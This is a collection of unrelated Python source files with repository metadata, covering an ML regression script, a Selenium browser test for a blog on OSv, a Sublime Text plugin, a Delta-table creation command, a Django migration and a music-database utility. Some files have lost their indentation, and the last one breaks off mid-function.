'min_samples_leaf':[10,30], 'subsample':[0.9]}
gbdt = GradientBoostingRegressor()
#DT = DecisionTreeClassifier()
clf = GridSearchCV(gbdt, parameters, n_jobs=-1, verbose=2, cv=5, scoring='neg_mean_squared_error')
clf.fit(trainX, trainY.values)
cv_result = pd.DataFrame.from_dict(clf.cv_results_)
with open('cv_result.csv', 'w') as f:
cv_result.to_csv(f)
if __name__ == '__main__':
rootPath = './data/'
trainX, trainY = loadData(rootPath + 'happiness_train_complete.csv')
#print(trainX)
# trainX, trainY = loadData(rootPath + 'happiness_train_abbr.csv')
# trainX = abs(trainX)
    # selector = SelectKBest(chi2, k=80)  # select the k best features
# selector.fit(trainX, trainY)
# trainX = selector.transform(trainX)
#gridSearch(trainX, trainY)
KFoldTest(trainX, trainY)
# clf = GradientBoostingRegressor(loss='ls', n_estimators=2000, learning_rate=.01, max_depth=10,
# random_state=int(time.time()), max_features=0.2,
# min_samples_leaf=30, subsample=0.5)
# clf.fit(trainX, trainY)
# res, contData = loadContestData(rootPath + 'happiness_test_complete.csv')
# labels = clf.predict(contData)
# res['happiness'] = labels
# res = res[['id', 'happiness']]
# res.to_csv(rootPath + 'myRes.csv', index=0)
"""happiness ...
1 104 ... 104
2 497 ... 497
3 1159 ... 1159
4 4818 ... 4818
5 1410 ... 1410
find happiness==4 at first ...
"""
|
6d1eadf913841139532155119635bb293b6ef5b1
|
2b319ab54d06a304397c43176ede37ae8669c6df
|
/ruby-publify/browser_test.py
|
e21a2bda6b36708641ea043a9e09820fd98e3cf8
|
[] |
no_license
|
cloudius-systems/osv-apps
|
54c389eb72f100a6e8485f92aa4553896c4bc8e5
|
22e1541ca18d3794053b9ca61671508a2d1944ec
|
refs/heads/master
| 2023-06-08T01:13:22.161834
| 2023-05-31T15:49:10
| 2023-05-31T15:49:10
| 14,896,375
| 122
| 69
| null | 2023-01-21T01:34:28
| 2013-12-03T14:44:26
|
Makefile
|
UTF-8
|
Python
| false
| false
| 2,993
|
py
|
browser_test.py
|
import sys
import subprocess
import signal
import re
from selenium import webdriver
def do_browser_test():
try:
driver = webdriver.Firefox()
driver.implicitly_wait(5) # seconds
driver.get('http://192.168.122.89:3000/')
driver.implicitly_wait(3) # seconds
blog_name = driver.find_element_by_id('setting_blog_name')
blog_name.send_keys(u'OSv blog')
email = driver.find_element_by_id('setting_email')
email.send_keys(u'syuu@cloudius-systems.com')
button = driver.find_element_by_id('submit')
button.click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'admin').click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'Articles').click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'New Article').click()
# Submit articles
for i in range(1, 20):
driver.implicitly_wait(3) # seconds
body = driver.find_element_by_id('article_body_and_extended')
body.send_keys(u'abcdef12345')
title = driver.find_element_by_id('article_title')
title.send_keys(u'article%d' % i)
title.submit()
driver.find_element_by_link_text(u'New article').click()
# Get submitted articles
driver.get('http://192.168.122.89:3000/')
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'Last').click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'Hello World!').click()
driver.back()
for i in range(1, 10):
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'article%d' % i).click()
driver.back()
driver.get('http://192.168.122.89:3000/')
for i in range(10, 20):
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'article%d' % i).click()
driver.back()
return True
    except Exception as e:
print(e)
return False
qemu = subprocess.Popen("./scripts/run.py -n", shell=True, cwd="../..", stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
while True:
line = qemu.stdout.readline().strip()
print(line)
if re.search(r'Listening on 0.0.0.0:3000', line) is not None:
result = do_browser_test()
subprocess.check_call(['killall', '-s', 'SIGINT', 'qemu-system-x86_64'])
qemu.wait()
if result == True:
break
else:
sys.exit(1)
if re.search(r'Aborted', line) is not None:
subprocess.check_call(['killall', '-s', 'SIGKILL', 'qemu-system-x86_64'])
qemu.wait()
sys.exit(1)
if qemu.poll() is not None:
print("qemu died")
sys.exit(1)
|
e2020618f713d39d81a83e1b21aead550b718e0e
|
914faa10e5423efc87d0079248b3eb7df72ed83e
|
/sublime.py
|
8c56ecdbb5d9a8e9bf058abc6e3c42757f2a66ac
|
[
"MIT"
] |
permissive
|
MagicStack/MagicPython
|
cf7b7ae8290b0e997adf6a197b2f5be300391a0a
|
7d0f2b22a5ad8fccbd7341bc7b7a715169283044
|
refs/heads/master
| 2023-08-26T04:16:54.672649
| 2022-10-18T07:43:20
| 2022-10-19T23:20:38
| 43,982,620
| 1,564
| 146
|
MIT
| 2023-02-23T19:40:57
| 2015-10-09T22:13:24
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 536
|
py
|
sublime.py
|
"""A plugin for Sublime Text to enhance f-string editing experience.
Specifically, this plugin simplifies typing of escaped curly braces
in an f-string:
{|}, where | marks the cursor position, gets replaced with
{{| when '{' is typed again.
"""
# Used by `settings/sublime/Default.sublime-keymap`.
import sublime_plugin
class FstringbraceCommand(sublime_plugin.WindowCommand):
def run(self):
view = self.window.active_view()
view.run_command('right_delete')
view.run_command('insert', {'characters': '{'})
|
5d509a85c362b631037375ae97708369a3f42906
|
c530897cb72b6943c7226b25824444cad5f3503b
|
/usaspending_api/etl/management/commands/create_delta_table.py
|
ccf56a2fc79dea9c6654423edba7fbe6c691ddf1
|
[
"CC0-1.0"
] |
permissive
|
fedspendingtransparency/usaspending-api
|
fc63a22d32ea0207b7273d3e1ef26ba9dbabc42a
|
38f920438697930ae3ac57bbcaae9034877d8fb7
|
refs/heads/master
| 2023-09-01T22:00:36.633612
| 2023-08-29T18:39:18
| 2023-08-29T18:39:18
| 65,394,827
| 276
| 118
|
CC0-1.0
| 2023-09-14T20:33:15
| 2016-08-10T15:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 3,866
|
py
|
create_delta_table.py
|
from django.core.management.base import BaseCommand
from pyspark.sql import SparkSession
from usaspending_api.config import CONFIG
from usaspending_api.common.helpers.spark_helpers import (
configure_spark_session,
get_jvm_logger,
get_active_spark_session,
)
from usaspending_api.etl.management.commands.load_query_to_delta import TABLE_SPEC as LOAD_QUERY_TABLE_SPEC
from usaspending_api.etl.management.commands.load_table_to_delta import TABLE_SPEC as LOAD_TABLE_TABLE_SPEC
TABLE_SPEC = {**LOAD_TABLE_TABLE_SPEC, **LOAD_QUERY_TABLE_SPEC}
class Command(BaseCommand):
help = """
This command creates an empty Delta Table based on the provided --destination-table argument.
"""
def add_arguments(self, parser):
parser.add_argument(
"--destination-table",
type=str,
required=True,
help="The destination Delta Table to write the data",
choices=list(TABLE_SPEC),
)
parser.add_argument(
"--spark-s3-bucket",
type=str,
required=False,
default=CONFIG.SPARK_S3_BUCKET,
help="The destination bucket in S3 to write the data",
)
parser.add_argument(
"--alt-db",
type=str,
required=False,
help="An alternate database (aka schema) in which to create this table, overriding the TABLE_SPEC db",
)
parser.add_argument(
"--alt-name",
type=str,
required=False,
help="An alternate delta table name for the created table, overriding the TABLE_SPEC destination_table "
"name",
)
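    # A hypothetical invocation sketch (the table name is illustrative and not
    # necessarily a real TABLE_SPEC key):
    #   python manage.py create_delta_table --destination-table awards --alt-db temp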
def handle(self, *args, **options):
extra_conf = {
            # Config for Delta Lake tables and SQL. Need these to keep Delta table metadata in the metastore
"spark.sql.extensions": "io.delta.sql.DeltaSparkSessionExtension",
"spark.sql.catalog.spark_catalog": "org.apache.spark.sql.delta.catalog.DeltaCatalog",
            # See the comments below: old date and time values cannot be parsed without these
"spark.sql.legacy.parquet.datetimeRebaseModeInWrite": "LEGACY", # for dates at/before 1900
"spark.sql.legacy.parquet.int96RebaseModeInWrite": "LEGACY", # for timestamps at/before 1900
"spark.sql.jsonGenerator.ignoreNullFields": "false", # keep nulls in our json
}
spark = get_active_spark_session()
spark_created_by_command = False
if not spark:
spark_created_by_command = True
spark = configure_spark_session(**extra_conf, spark_context=spark) # type: SparkSession
# Setup Logger
logger = get_jvm_logger(spark)
# Resolve Parameters
destination_table = options["destination_table"]
spark_s3_bucket = options["spark_s3_bucket"]
table_spec = TABLE_SPEC[destination_table]
destination_database = options["alt_db"] or table_spec["destination_database"]
destination_table_name = options["alt_name"] or destination_table
# Set the database that will be interacted with for all Delta Lake table Spark-based activity
logger.info(f"Using Spark Database: {destination_database}")
spark.sql(f"create database if not exists {destination_database};")
spark.sql(f"use {destination_database};")
# Define Schema Using CREATE TABLE AS command
spark.sql(
TABLE_SPEC[destination_table]["delta_table_create_sql"].format(
DESTINATION_TABLE=destination_table_name,
DESTINATION_DATABASE=destination_database,
SPARK_S3_BUCKET=spark_s3_bucket,
DELTA_LAKE_S3_PATH=CONFIG.DELTA_LAKE_S3_PATH,
)
)
if spark_created_by_command:
spark.stop()
|
285c6213753cb3cf9c30bdbb023cb7669561bcca
|
61b1380f8e6cc00a2dcab0280deff8c18c4812c2
|
/pydis_site/apps/api/migrations/0084_infraction_last_applied.py
|
7704ddb821864f734879dcacd41d436cd1dfd7bc
|
[
"MIT"
] |
permissive
|
python-discord/site
|
969ada9c7d70edeaadb781e630c8896b4a207f90
|
cb6326cabee6570a5725702cb2893ae39f752279
|
refs/heads/main
| 2023-09-04T07:17:58.116382
| 2023-08-31T14:20:38
| 2023-08-31T14:20:38
| 120,370,405
| 746
| 224
|
MIT
| 2023-09-14T10:23:08
| 2018-02-05T22:31:04
|
Python
|
UTF-8
|
Python
| false
| false
| 816
|
py
|
0084_infraction_last_applied.py
|
# Generated by Django 4.0.6 on 2022-07-27 20:32
import django.utils.timezone
from django.db import migrations, models
from django.apps.registry import Apps
def set_last_applied_to_inserted_at(apps: Apps, schema_editor):
Infractions = apps.get_model("api", "infraction")
Infractions.objects.all().update(last_applied=models.F("inserted_at"))
class Migration(migrations.Migration):
dependencies = [
('api', '0083_remove_embed_validation'),
]
operations = [
migrations.AddField(
model_name='infraction',
name='last_applied',
field=models.DateTimeField(default=django.utils.timezone.now, help_text='The date and time of when this infraction was last applied.'),
),
migrations.RunPython(set_last_applied_to_inserted_at)
]
|
ffa9d6f4fb4eb7180e84e4285090be2789f51d3a
|
4d44674625100e62be2bb5033339fb641bd454ac
|
/snippet/example/python/check_music.py
|
fd3572bb2ddc9c0d535058b428d522488f956308
|
[
"MIT"
] |
permissive
|
xgfone/snippet
|
8b9004a649d2575b493a376c4b4f3d4a7c56a4b0
|
b0b734dd35478b7ef3e6193623981f4f29b6748c
|
refs/heads/master
| 2022-03-18T12:41:09.033144
| 2022-02-20T15:26:35
| 2022-02-20T15:26:35
| 41,615,643
| 158
| 61
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 36,520
|
py
|
check_music.py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
#
# Support Python 3.6+
#
# Install:
# $ pip3 install six gevent requests sqlalchemy pymysql requests_html openpyxl
#
# Run:
# $ python check_music.py -h
#
import gevent.pool
import gevent.monkey
gevent.monkey.patch_all(Event=True, sys=True)
taskpool = gevent.pool.Pool(size=1000)
spawn = taskpool.spawn
import sys
import logging
import traceback
PY3, Unicode, Bytes = True, str, bytes
LOG = logging.getLogger()
def to_bytes(v, encoding="utf-8", **kwargs):
if isinstance(v, Bytes):
return v
elif isinstance(v, Unicode):
return v.encode(encoding)
return to_bytes(str(v), encoding=encoding)
def to_unicode(v, encoding="utf-8", **kwargs):
if isinstance(v, Bytes):
return v.decode(encoding)
elif isinstance(v, Unicode):
return v
return to_unicode(str(v), encoding=encoding)
to_str = to_unicode if PY3 else to_bytes
is_bytes = lambda s: isinstance(s, Bytes)
is_unicode = lambda s: isinstance(s, Unicode)
is_string = lambda s: isinstance(s, (Bytes, Unicode))
def init_logging(logger, level, log_file=None):
fmt = "%(asctime)s - %(pathname)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s"
datefmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(fmt=fmt, datefmt=datefmt)
level = getattr(logging, level.upper())
logger.setLevel(level)
if log_file:
from logging.handlers import TimedRotatingFileHandler
handler = TimedRotatingFileHandler(log_file, when="midnight", interval=1, backupCount=30)
else:
handler = logging.StreamHandler()
handler.setLevel(level)
handler.setFormatter(formatter)
logger.addHandler(handler)
##############################################################################
# Configuration
from argparse import ArgumentParser
# @Author: xgfone
# @Email: xgfone@126.com
class Configuration(object):
class Group(object):
def __init__(self, group_name):
self.__name = group_name
def __repr__(self):
attrs = []
for key, value in vars(self).items():
if key != "_Group__name":
attrs.append("{0}={1}".format(key, value))
return "{0}({1})".format(self.__class__.__name__, ", ".join(attrs))
def __contains__(self, name):
return hasattr(self, name)
def __getattr__(self, name):
e = "The group '{0}' has no the option '{1}'"
raise AttributeError(e.format(self.__name, name))
def __setitem__(self, name, value):
setattr(self, name, value)
def __getitem__(self, name):
try:
return getattr(self, name)
except AttributeError:
e = "The group '{0}' has no the option '{1}'"
raise KeyError(e.format(self.__name, name))
def items(self):
d = vars(self)
d.pop("_Group__name")
return d.items()
__slots__ = ["_default_group_name", "_default_group", "_allow_empty",
"_encoding", "_parsed", "_caches", "_opts", "_bool_true",
"_bool_false", "_py2", "_description", "_version"]
def __init__(self, description=None, allow_empty=False, encoding="utf-8",
default_group="DEFAULT", version=None):
"""A simple configuration file parser based on the format INI.
When an configuration option does not exist, for getting one default
value, not raising an exception, please use the method of get(), or the
builtin function of getattr().
"""
self._parsed = False
self._description = description
self._default_group_name = default_group
self._default_group = Configuration.Group(self._default_group_name)
self._allow_empty = allow_empty
self._encoding = encoding
self._version = version if version else "Unknown"
self._caches = {self._default_group_name: self._default_group}
self._opts = {}
self._bool_true = ["t", "1", "on", "true"]
self._bool_false = ["f", "0", "off", "false"]
try:
"".decode()
except AttributeError:
self._py2 = False
else:
self._py2 = True
def __getattr__(self, name):
if not self._parsed:
raise Exception("Not parsed")
try:
return self._caches[name]
except KeyError:
pass
msg = "'{0}' object has no attribute '{1}'"
raise AttributeError(msg.format(self.__class__.__name__, name))
def __getitem__(self, name):
if not self._parsed:
raise Exception("Not parsed")
_name = self._uniformize(name)
try:
return self._caches[_name]
except KeyError:
pass
msg = "'{0}' has no key '{1}'"
raise KeyError(msg.format(self.__class__.__name__, name))
def __repr__(self):
attrs = []
for key, value in self._caches.items():
attrs.append("{0}={1}".format(key, value))
return "{0}({1})".format(self.__class__.__name__, ", ".join(attrs))
def _set_group_opt(self, group_name, opt_name, opt_value, force=False):
gname = group_name if group_name else self._default_group_name
group = self._caches[gname]
if hasattr(group, opt_name) and not force:
e = "The group '{0}' has had the option of '{1}'"
raise ValueError(e.format(gname, opt_name))
setattr(self._caches[gname], opt_name, opt_value)
def _register(self, name, parser, default=None, group=None, help=None, short=None):
if self._parsed:
raise Exception("Have been parsed")
name = self._uniformize(name)
group = self._uniformize(group if group else self._default_group_name)
self._opts.setdefault(group, {})
if name in self._opts[group]:
raise KeyError("The option {0} has been regisetered".format(name))
self._opts[group][name] = (parser, default, help, short)
self._caches.setdefault(group, Configuration.Group(group))
def _parse_int(self, value):
return int(value)
def _parse_float(self, value):
return float(value)
def _parse_bool(self, value):
if isinstance(value, bool):
return value
elif not is_string(value):
return bool(value)
value = value.lower()
if value in self._bool_true:
return True
elif value in self._bool_false:
return False
raise ValueError("invalid bool value '{0}'".format(value))
def _parse_string(self, value):
if self._py2:
if isinstance(value, str):
return value.decode(self._encoding)
else:
if not isinstance(value, str):
return value.decode(self._encoding)
return value
def _parse_ints(self, value):
return self._parse_list(self._parse_int, value)
def _parse_strings(self, value):
return self._parse_list(self._parse_string, value)
def _parse_list(self, parser, value):
if isinstance(value, (list, tuple)):
vs = value
else:
vs = (v.strip() for v in value.split(",") if v.strip())
return tuple((parser(v) for v in vs))
def _uniformize(self, name):
return name.replace("-", "_")
def _unniformize(self, name):
return name.replace("_", "-")
def parsed(self):
"""Return True if it has been parsed, or False."""
return self._parsed
def parse_files(self, filenames=""):
"""Parse the INI configuration files.
The argument is either a string standing for the path of the
configuration file, or a list of them.
"""
if self._parsed:
raise Exception("Have been parsed")
self._parsed = True
if filenames:
if not isinstance(filenames, (list, tuple)):
filenames = self._parse_string(filenames).strip(", ").split(",")
for filename in filenames:
self._parse_file(filename)
self._check_and_fix()
def _check_and_fix(self):
for gname, opts in self._opts.items():
group = self._caches[gname]
for name, opt in opts.items():
if name in group:
continue
elif opt[1] is not None or opt[0] == self._parse_bool:
self._set_group_opt(gname, name, opt[1])
continue
if not self._allow_empty:
msg = "The option '{0}' in the group '{1}' has no value."
raise ValueError(msg.format(name, gname))
# Set the options in the default group into self.
group = self._caches.pop(self._default_group_name)
for key, value in group.items():
if key in self._caches:
msg = "'{0}' had has the value '{1}'"
raise ValueError(msg.format(self.__class__.__name__, key))
self._caches[key] = value
def _parse_file(self, filename):
filename = str(filename)
with open(filename) as f:
lines = f.readlines()
gname = self._default_group_name
index, max_index = 0, len(lines)
while index < max_index:
line = self._parse_string(lines[index]).strip()
index += 1
# Comment
if not line or line[0] in ("#", "=", ";"):
continue
# Group Section
if line[0] == "[":
if line[-1] != "]":
m = ("the format of the group is wrong, "
"which must start with [ and end with ]")
raise ValueError(m)
_gname = line[1:-1]
if not _gname:
raise ValueError("the group name is empty")
if _gname not in self._caches:
continue
gname = _gname
continue
# Group Option Values
items = line.split("=", 1)
if len(items) != 2:
raise ValueError("the format is wrong, must contain '=': " + line)
name, value = self._uniformize(items[0].strip()), items[1].strip()
# Handle the continuation line
if value[-1:] == "\\":
values = [value.rstrip("\\").strip()]
while index < max_index:
value = lines[index].strip()
values.append(value.rstrip("\\").strip())
index += 1
if value[-1:] != "\\":
break
value = "\n".join(values)
opt = self._opts[gname].get(name, None)
if opt:
self._set_group_opt(gname, name, opt[0](value))
def register_bool(self, name, short=None, default=None, group=None, help=None):
"""Register the bool option.
The value of this option will be parsed to the type of bool.
"""
self._register(name, self._parse_bool, short=short, default=default,
group=group, help=help)
def register_int(self, name, short=None, default=None, group=None, help=None):
"""Register the int option.
The value of this option will be parsed to the type of int.
"""
self._register(name, self._parse_int, short=short, default=default,
group=group, help=help)
def register_float(self, name, short=None, default=None, group=None, help=None):
"""Register the float option.
The value of this option will be parsed to the type of float.
"""
self._register(name, self._parse_float, short=short, default=default,
group=group, help=help)
def register_str(self, name, short=None, default=None, group=None, help=None):
"""Register the str option.
The value of this option will be parsed to the type of str.
"""
self._register(name, self._parse_string, short=short, default=default,
group=group, help=help)
def register_int_list(self, name, short=None, default=None, group=None, help=None):
"""Register the int list option.
The value of this option will be parsed to the type of int list.
"""
self._register(name, self._parse_ints, short=short, default=default,
group=group, help=help)
def register_str_list(self, name, short=None, default=None, group=None, help=None):
"""Register the string list option.
The value of this option will be parsed to the type of string list.
"""
self._register(name, self._parse_strings, short=short, default=default,
group=group, help=help)
###########################################################################
# Parse CLI
def parse(self, *args, **kwargs):
return self.parse_cli(*args, **kwargs)
def parse_cli(self, args=None, config_file_name="config-file"):
"""Parse the cli options."""
if self._parsed:
raise Exception("Have been parsed")
self._parsed = True
if args is None:
args = sys.argv[1:]
if not args:
self._check_and_fix()
return None
gopts, args = self._parser_cli(args, description=self._description,
config_file_name=config_file_name)
if getattr(args, "version", False):
print(self._version)
sys.exit(0)
if config_file_name:
config_file = getattr(args, self._uniformize(config_file_name), "")
for filename in config_file.split(","):
filename = filename.strip()
if filename:
self._parse_file(filename)
for cli_opt, (gname, name) in gopts.items():
opt = self._opts[gname][name]
value = getattr(args, cli_opt, None)
if value is not None:
value = opt[0](value)
if value != opt[1]:
self._set_group_opt(gname, name, value, force=True)
self._check_and_fix()
return args
def _parser_cli(self, args, description=None, config_file_name=None):
cli = ArgumentParser(description=description)
if config_file_name:
cli.add_argument("--" + config_file_name, default="",
help="The config file path.")
cli.add_argument("--version", action="store_true",
help="Print the version and exit.")
group_opts = {}
for gname, opts in self._opts.items():
if gname == self._default_group_name:
group = cli
else:
group = cli.add_argument_group(gname)
for name, (parser, default, help, short) in opts.items():
action = None
if parser == self._parse_bool:
action = "store_false" if default else "store_true"
default = False if default is None else default
if gname == self._default_group_name:
opt_name = self._unniformize(name)
opt_key = self._uniformize(name)
else:
opt_name = self._unniformize("{0}-{1}".format(gname, name))
opt_key = self._uniformize(opt_name)
group_opts[opt_key] = (gname, name)
short = "-" + short if short and short[0] != "-" else short
names = [short, "--" + opt_name] if short else ["--" + opt_name]
group.add_argument(*names, action=action, default=default, help=help)
return group_opts, cli.parse_args(args=args)
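# A minimal usage sketch of the Configuration class above (the option names and
# the INI file path are hypothetical, for illustration only):
#
#     conf = Configuration(description="demo", version="0.1")
#     conf.register_str("host", default="127.0.0.1", help="The listen host.")
#     conf.register_int("port", default=8080, group="http", help="The listen port.")
#     conf.parse_files("demo.ini")   # or conf.parse_cli() to read sys.argv
#     print(conf.host, conf.http.port)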
# Configuration End
###############################################################################
###############################################################################
# Common
import requests
from urllib.parse import quote as qs_quote
def send_http_get(url, quote=True, use_key=False, co="?", timeout=5,
                  raise404=True, has_result=True, json=True, **ks):
if ks:
to = lambda v: qs_quote(to_str(v)) if quote else v
ks = {k: to(v() if callable(v) else v) for k, v in ks.items() if v is not None}
if use_key:
url = co.join((url, "&".join(("%s=%s" % (k, v) for k, v in ks.items()))))
else:
url = url.format(**ks)
resp = requests.get(url, timeout=timeout)
status_code = resp.status_code
if status_code == 404:
if raise404:
raise Exception("not found %s" % url)
return None
elif status_code == 200:
if has_result:
            # return the raw response text when json=False (e.g. JSONP payloads)
            return resp.json() if json else resp.text
return None
elif status_code == 204:
return None
raise OSError("%s: status_code=%s" % (url, status_code))
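# A minimal usage sketch for send_http_get (the URLs below are hypothetical):
#   send_http_get("http://example.com/api/{id}", id=42)             # URL template substitution
#   send_http_get("http://example.com/api", use_key=True, q="abc")  # append a query string
#   send_http_get("http://example.com/api", json=False)             # raw text, e.g. JSONP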
# Common End
###############################################################################
###############################################################################
# DB Common
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker, object_mapper
from sqlalchemy.sql.elements import TextClause
Iterator = object
class DB(object):
"""Manager the DB connection."""
def __init__(self, write_connection, read_connection=None, autocommit=True,
expire_on_commit=False, echo=False, encoding=str("utf8"),
poolclass=None, pool=None, min_pool_size=2, max_pool_size=5,
pool_timeout=30, idle_timeout=3600):
write_connection = self._fix_charset(write_connection, encoding)
if read_connection:
read_connection = self._fix_charset(read_connection, encoding)
kwargs = {
"echo": echo,
"encoding": encoding,
"poolclass": poolclass,
"pool": pool,
"pool_size": min_pool_size,
"pool_timeout": pool_timeout if pool_timeout else None,
"pool_recycle": idle_timeout,
"max_overflow": max_pool_size - min_pool_size,
"convert_unicode": True,
}
self._autocommit = autocommit
self._expire_on_commit = expire_on_commit
self._write_engine = self._create_engine(write_connection, kwargs)
self._write_session_cls = self._get_session_cls(self._write_engine)
if read_connection:
self._read_engine = self._create_engine(read_connection, kwargs)
self._read_session_cls = self._get_session_cls(self._read_engine)
else:
self._read_engine = self._write_engine
self._read_session_cls = self._write_session_cls
def _fix_charset(self, connection, encoding):
if "mysql" in connection and "charset=" not in connection:
if "?" in connection:
return "%s&charset=%s" % (connection, encoding)
return "%s?charset=%s" % (connection, encoding)
return connection
def _create_engine(self, connection, kwargs):
if connection.startswith("sqlite:///"):
kwargs.pop("pool_size", None)
kwargs.pop("pool_timeout", None)
kwargs.pop("max_overflow", None)
return create_engine(connection, **kwargs)
def _get_session_cls(self, engine):
return sessionmaker(bind=engine, autocommit=self._autocommit,
expire_on_commit=self._expire_on_commit)
def get_write_session(self):
return self._write_session_cls()
def get_read_session(self):
return self._read_session_cls()
def get_session(self):
return self.get_write_session()
def execute(self, sql, session=None, **kwargs):
if not isinstance(sql, TextClause):
sql = text(sql)
return (session or self.get_session()).execute(sql, kwargs)
def fetchall(self, sql, **kwargs):
return self.execute(sql, self.get_read_session(), **kwargs).fetchall()
def fetchone(self, sql, **kwargs):
return self.execute(sql, self.get_read_session(), **kwargs).fetchone()
def first(self, sql, **kwargs):
return self.execute(sql, self.get_read_session(), **kwargs).first()
class ModelBase(Iterator):
"""Base class for models."""
__tablename__ = ""
__table_initialized__ = False
def save(self, session):
"""Save this object."""
        # NOTE(boris-42): This part of code should look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
session.add(self)
session.flush()
def __repr__(self):
attrs = ", ".join(("%s=%s" % (k, v) for k, v in self.items()))
return "%s(%s)" % (self.__tablename__.title(), attrs)
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def __contains__(self, key):
# Don't use hasattr() because hasattr() catches any exception, not only
# AttributeError. We want to passthrough SQLAlchemy exceptions
# (ex: sqlalchemy.orm.exc.DetachedInstanceError).
try:
getattr(self, key)
except AttributeError:
return False
else:
return True
def get(self, key, default=None):
return getattr(self, key, default)
def __iter__(self):
columns = list(dict(object_mapper(self).columns).keys())
return ModelIterator(self, iter(columns))
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in values.items():
setattr(self, k, v)
def _as_dict(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict((key, value) for key, value in self)
joined = dict([(k, v) for k, v in self.__dict__.items() if not k[0] == '_'])
local.update(joined)
return local
def items(self):
"""Make the model object behave like a dict."""
return self._as_dict().items()
def keys(self):
"""Make the model object behave like a dict."""
return [key for key, value in self.items()]
class ModelIterator(Iterator):
def __init__(self, model, columns):
self.model = model
self.i = columns
def __iter__(self):
return self
# In Python 3, __next__() has replaced next().
def __next__(self):
n = next(self.i)
return n, getattr(self.model, n)
# DB Common End
###############################################################################
###############################################################################
# DB
from datetime import datetime
from sqlalchemy import Column, String, Boolean, Integer, DateTime
from sqlalchemy.sql import func, expression as expr
from sqlalchemy.ext.declarative import declarative_base
BASE = declarative_base()
class MusicBase(ModelBase):
id = Column(Integer, primary_key=True)
sid = Column(String(16), nullable=False)
name = Column(String(128), nullable=False)
singer = Column(String(128), nullable=False)
ablum = Column(String(128), nullable=False)
url = Column(String(128), nullable=False, server_default="")
check = Column(Boolean, nullable=False, index=True, server_default=expr.text("0"))
update_time = Column(DateTime, nullable=False, server_default=func.now())
class Music0(MusicBase, BASE):
__tablename__ = "music0"
class Music1(MusicBase, BASE):
__tablename__ = "music1"
class Music2(MusicBase, BASE):
__tablename__ = "music2"
class Music3(MusicBase, BASE):
__tablename__ = "music3"
class Music4(MusicBase, BASE):
__tablename__ = "music4"
class Music5(MusicBase, BASE):
__tablename__ = "music5"
class Music6(MusicBase, BASE):
__tablename__ = "music6"
class Music7(MusicBase, BASE):
__tablename__ = "music7"
class Music8(MusicBase, BASE):
__tablename__ = "music8"
class Music9(MusicBase, BASE):
__tablename__ = "music9"
class Music10(MusicBase, BASE):
__tablename__ = "music10"
class Music11(MusicBase, BASE):
__tablename__ = "music11"
class Music12(MusicBase, BASE):
__tablename__ = "music12"
class Music13(MusicBase, BASE):
__tablename__ = "music13"
class Music14(MusicBase, BASE):
__tablename__ = "music14"
class Music15(MusicBase, BASE):
__tablename__ = "music15"
class Music16(MusicBase, BASE):
__tablename__ = "music16"
class Music17(MusicBase, BASE):
__tablename__ = "music17"
class Music18(MusicBase, BASE):
__tablename__ = "music18"
class Music19(MusicBase, BASE):
__tablename__ = "music19"
class Music20(MusicBase, BASE):
__tablename__ = "music20"
MusicModels = {
"0": Music0,
"1": Music1,
"2": Music2,
"3": Music3,
"4": Music4,
"5": Music5,
"6": Music6,
"7": Music7,
"8": Music8,
"9": Music9,
"10": Music10,
"11": Music11,
"12": Music12,
"13": Music13,
"14": Music14,
"15": Music15,
"16": Music16,
"17": Music17,
"18": Music18,
"19": Music19,
"20": Music20,
}
class DBAPI(DB):
def __init__(self, db_no, *args, **kwargs):
super(DBAPI, self).__init__(*args, **kwargs)
self._db_no = str(db_no)
self._model = self._get_model(self._db_no)
def create_tables(self):
BASE.metadata.create_all(self._write_engine)
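    # Note: _get_model below shards by the last character of the given key, so a
    # hypothetical sid "12345" (or db_no "5") maps to the "music5" table.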
def _get_model(self, sid):
return MusicModels[sid[-1]]
def get_unchecked_musics(self, num=1000):
s = self.get_session()
return s.query(self._model).filter_by(check=False).limit(num).all()
def get_checked_musics(self):
s = self.get_session()
return s.query(self._model).filter_by(check=True).filter(self._model.url != "").all()
def add_music(self, num, sid, name, singer, ablum, use_sid=False):
m = self._get_model(sid[-1] if use_sid else str(num))
m(sid=sid, name=name, singer=singer, ablum=ablum).save(self.get_session())
def set_url(self, id, url):
ks = {"update_time": datetime.now(), "check": True, "url": url}
self.get_session().query(self._model).filter_by(id=id).update(ks)
# DB End
###############################################################################
import json
import os.path
from requests import ConnectionError, Timeout
from requests_html import HTMLSession
_SITES = {}
def register(name, *args, **kwargs):
def decorate(cls):
if name in _SITES:
raise ValueError("The site '%s' has been registered" % name)
_SITES[name] = cls(*args, **kwargs)
return cls
return decorate
def import_xlsx_into_db(dbapi, xlsx_path, columns=(0, 1, 2, 3), table_num=0):
from openpyxl import load_workbook
if not os.path.exists(xlsx_path):
raise RuntimeError("The Excel file '%s' does not exist" % xlsx_path)
def _import(i, num, id, name, ablum, singer):
id = str(id.value)
name = str(name.value)
ablum = str(ablum.value)
singer = str(singer.value)
if id and name and ablum and singer:
try:
dbapi.add_music(num, id, name, singer, ablum, use_sid=not table_num)
except Exception as err:
LOG.error(err)
LOG.debug("import row %s", i)
ts = []
num = 0
id_i, name_i, ablum_i, singer_i = columns
ws = load_workbook(xlsx_path).active
for i, r in enumerate(ws.rows, 1):
t = spawn(_import, i, num, r[id_i], r[name_i], r[ablum_i], r[singer_i])
ts.append(t)
